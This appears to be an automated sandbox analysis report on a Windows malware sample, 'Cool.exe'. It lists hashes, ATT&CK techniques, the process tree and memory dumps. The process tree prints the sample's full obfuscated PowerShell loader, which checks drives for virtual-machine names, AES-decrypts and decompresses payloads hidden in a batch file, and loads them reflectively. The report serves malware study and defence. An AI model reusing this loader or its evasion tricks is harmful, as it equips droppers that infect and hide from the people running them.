58b023b2f159ddc8d2980121e1d92f4c9d3191f215772c00e8b4979c96612f22

General

Target

Cool.exe
Size

7.4MB
MD5

a4ca130e28b42a5cadb6499ecdb8cbf3
SHA1

d3a6e00243b76e6d549a5978fe4cfd2be00c6762
SHA256

58b023b2f159ddc8d2980121e1d92f4c9d3191f215772c00e8b4979c96612f22
SHA512

4733614f8416eaff00e85e1eb51f7123dbd6b818e83ead795039c650b7f48538c8a0b5d846e654b8a329ea8e0a9b555bd7526dda743fba26a93c3a3c77ad7e87
SSDEEP

196608:HMRAj7qnuvwmR+hd5s4iMket2/cEbC/julftfuhk7BxB:1Qg+5cRC2FfUkVT

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2816	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2816	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2816	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 1276 wrote to memory of 668	1276	Cool.exe	29
PID 1276 wrote to memory of 668	1276	Cool.exe	29
PID 1276 wrote to memory of 668	1276	Cool.exe	29
PID 668 wrote to memory of 2828	668	cmd.exe	31
PID 668 wrote to memory of 2828	668	cmd.exe	31
PID 668 wrote to memory of 2828	668	cmd.exe	31
PID 668 wrote to memory of 2788	668	cmd.exe	32
PID 668 wrote to memory of 2788	668	cmd.exe	32
PID 668 wrote to memory of 2788	668	cmd.exe	32
PID 668 wrote to memory of 2876	668	cmd.exe	33
PID 668 wrote to memory of 2876	668	cmd.exe	33
PID 668 wrote to memory of 2876	668	cmd.exe	33
PID 668 wrote to memory of 2892	668	cmd.exe	34
PID 668 wrote to memory of 2892	668	cmd.exe	34
PID 668 wrote to memory of 2892	668	cmd.exe	34
PID 668 wrote to memory of 3020	668	cmd.exe	35
PID 668 wrote to memory of 3020	668	cmd.exe	35
PID 668 wrote to memory of 3020	668	cmd.exe	35
PID 668 wrote to memory of 2816	668	cmd.exe	36
PID 668 wrote to memory of 2816	668	cmd.exe	36
PID 668 wrote to memory of 2816	668	cmd.exe	36

C:\Users\Admin\AppData\Local\Temp\Cool.exe
"C:\Users\Admin\AppData\Local\Temp\Cool.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1276
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Roaming\Fixer.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:668
- - C:\Windows\system32\fsutil.exe
    fsutil fsinfo drives
    3⤵
    PID:2828
- - C:\Windows\system32\findstr.exe
    findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
    3⤵
    PID:2788
- - C:\Windows\system32\fsutil.exe
    fsutil fsinfo drives
    3⤵
    PID:2876
- - C:\Windows\system32\findstr.exe
    findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
    3⤵
    PID:2892
- - C:\Windows\system32\cmd.exe
    cmd.exe /c echo function FlUs($RtYx){ Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose '$Olib=[NPSNPyNPsNPtNPeNPm.NPSNPeNPcNPuNPrNPitNPyNP.NPCrNPyNPpNPtNPoNPgNPrNPaNPpNPhNPyNP.ANPeNPsNP]NP:NP:NPCNPreNPaNPtNPe(NP);'.Replace('NP', ''); Invoke-Expression -WarningAction Inquire -Verbose -InformationAction Ignore -Debug '$Olib.MfOofOdfOefO=fO[fOSyfOsfOtfOefOmfO.fOSefOcfOufOrifOtfOyfO.fOCfOrfOyfOpfOtfOofOgfOrafOpfOhfOyfO.fOCfOifOphfOefOrfOMofOdefO]fO:fO:fOCfOBfOC;'.Replace('fO', ''); Invoke-Expression -WarningAction Inquire -Verbose -Debug '$Olib.PbGabGdbGdbGibGnbGg=bG[bGSbGybGsbGtbGembG.bGSbGecbGubGrbGibGtbGybG.bGCbGrbGybGpbGtobGgbGrbGabGpbGhbGybG.PbGabGdbGdibGngbGMbGobGdbGebG]bG::bGPbGKbGCbGSbG7;'.Replace('bG', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Debug -Verbose '$Olib.Ktpetpytp=tp[tpStpystpttpetpmtp.tpCtpontpvtpetprttp]tp:tp:tpFtprtpotpmtpBtpatpstpe6tp4tpStpttprtpitpntpg("NtpAtpZtpNtpHtp6tprDtpltpltpStpztpZtp31tpttpytpHOtpdtpptpltpjtpTtpItpptpHtpqtpNtpcAtp2tpltpOtpPtpKtpktpQXtpwtp/tpFctp=");'.Replace('tp', ''); Invoke-Expression -WarningAction Inquire '$Olib.IULVUL=UL[ULSULyULstULeULmUL.ULCULoULnvULeULrULt]UL:UL:ULFULrULoULmULBULaULsULeUL64ULSULtULrULiULnULg("tULOULZULkUL0ULHULCZULUULIULOUL0ULVULpIULgULgUL/GUL5UL8ULwUL=UL=UL");'.Replace('UL', ''); $Xiel=$Olib.CreateDecryptor(); $khkv=$Xiel.TransformFinalBlock($RtYx, 0, $RtYx.Length); $Xiel.Dispose(); $Olib.Dispose(); $khkv;}function nndR($RtYx){ Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire '$kFvs=NJceJcwJc-JcOJcbJcjeJccJctJc JcSJcyJcstJceJcmJc.IJcOJc.JcMJceJcmJcoJcrJcyJcSJctJcreJcaJcmJc(,$RtYx);'.Replace('Jc', ''); Invoke-Expression -WarningAction Inquire '$zfZZ=NJceJcwJc-JcOJcbJcjeJccJctJc JcSJcyJcstJceJcmJc.IJcOJc.JcMJceJcmJcoJcrJcyJcSJctJcreJcaJcmJc;'.Replace('Jc', ''); Invoke-Expression -Debug '$nYxJ=NVqeVqwVq-VqOVqbVqjeVqcVqtVq VqSVqyVqstVqeVqmVq.IVqOVq.VqCVqoVqmVqpVqrVqeVqsVqsVqioVqnVq.VqGVqZVqiVqpVqStVqrVqeVqamVq($kFvs, [VqIVqOVq.VqCVqoVqmpVqrVqeVqsVqsVqiVqonVq.VqCVqomVqpVqrVqeVqsVqsVqiVqoVqnVqMVqoVqdeVq]Vq:Vq:VqDVqeVqcVqomVqpVqrVqesVqs);'.Replace('Vq', ''); $nYxJ.CopyTo($zfZZ); $nYxJ.Dispose(); $kFvs.Dispose(); $zfZZ.Dispose(); $zfZZ.ToArray();}function csqF($RtYx,$tura){ Invoke-Expression -InformationAction Ignore '$oOIa=[iaSiayiasiatiaeiam.iaRiaeiafialiaeiactiaiiaoian.iaAiasiasiaeiamiabialiayia]ia:ia:Liaoiaaiadia([byte[]]$RtYx);'.Replace('ia', ''); Invoke-Expression -Debug -Verbose '$LDvh=$oOIa.EnInnItnIrnIynIPnIoinInnItnI;'.Replace('nI', ''); Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Verbose -Debug '$LDvh.KUIKUnKUvKUoKUkKUe(KU$KUnKUuKUlKUl, $tura);'.Replace('KU', '');}$tKua = 'C:\Users\Admin\AppData\Roaming\Fixer.bat';$host.UI.RawUI.WindowTitle = $tKua;$FQFy=[System.IO.File]::ReadAllText($tKua).Split([Environment]::NewLine);foreach ($Szce in $FQFy) { if ($Szce.StartsWith('hfEMc')) { $SPWC=$Szce.Substring(5); break; }}$UbZi=[string[]]$SPWC.Split('\');Invoke-Expression -InformationAction Ignore -Verbose -Debug -WarningAction Inquire '$cVz = nndR (FlUs ([auCauoaunauvaueaurtau]au:au:auFaurauomauBauaauseau6au4auSautaurauiaunaugau($UbZi[0].Replace("#", "/").Replace("@", "A"))));'.Replace('au', '');Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore '$Noc = nndR (FlUs ([auCauoaunauvaueaurtau]au:au:auFaurauomauBauaauseau6au4auSautaurauiaunaugau($UbZi[1].Replace("#", "/").Replace("@", "A"))));'.Replace('au', '');Invoke-Expression -Verbose -WarningAction Inquire -Debug -InformationAction Ignore '$AAQ = nndR (FlUs ([auCauoaunauvaueaurtau]au:au:auFaurauomauBauaauseau6au4auSautaurauiaunaugau($UbZi[2].Replace("#", "/").Replace("@", "A"))));'.Replace('au', '');csqF $cVz $null;csqF $Noc $null;csqF $AAQ (,[string[]] (''));
    3⤵
    PID:3020
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2816

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Fixer.bat

Filesize
7.4MB

MD5
2fe951de913b3076a2e0278089f8a404

SHA1
a26e73180e7d766f0dc23a3fd716ab8715849241

SHA256
c15e1c068d7052a1a8003dc352610dabb49c5aff41ad73804284cd462460fc3b

SHA512
e3de3dbee160db23e64f4735a9d86ba627c7e1fdf8917291df8e5b478ac17cfc822acab539a3a86f82fc0dd71598a250d346c44ebb2b79d816dc442fd064f40f

Download Submit
memory/1276-0-0x000007FEF6253000-0x000007FEF6254000-memory.dmp

Filesize
4KB

Download
memory/1276-1-0x0000000000B00000-0x000000000126A000-memory.dmp

Filesize
7.4MB

Download
memory/2816-15-0x000000001B3E0000-0x000000001B6C2000-memory.dmp

Filesize
2.9MB

Download
memory/2816-16-0x0000000002360000-0x0000000002368000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing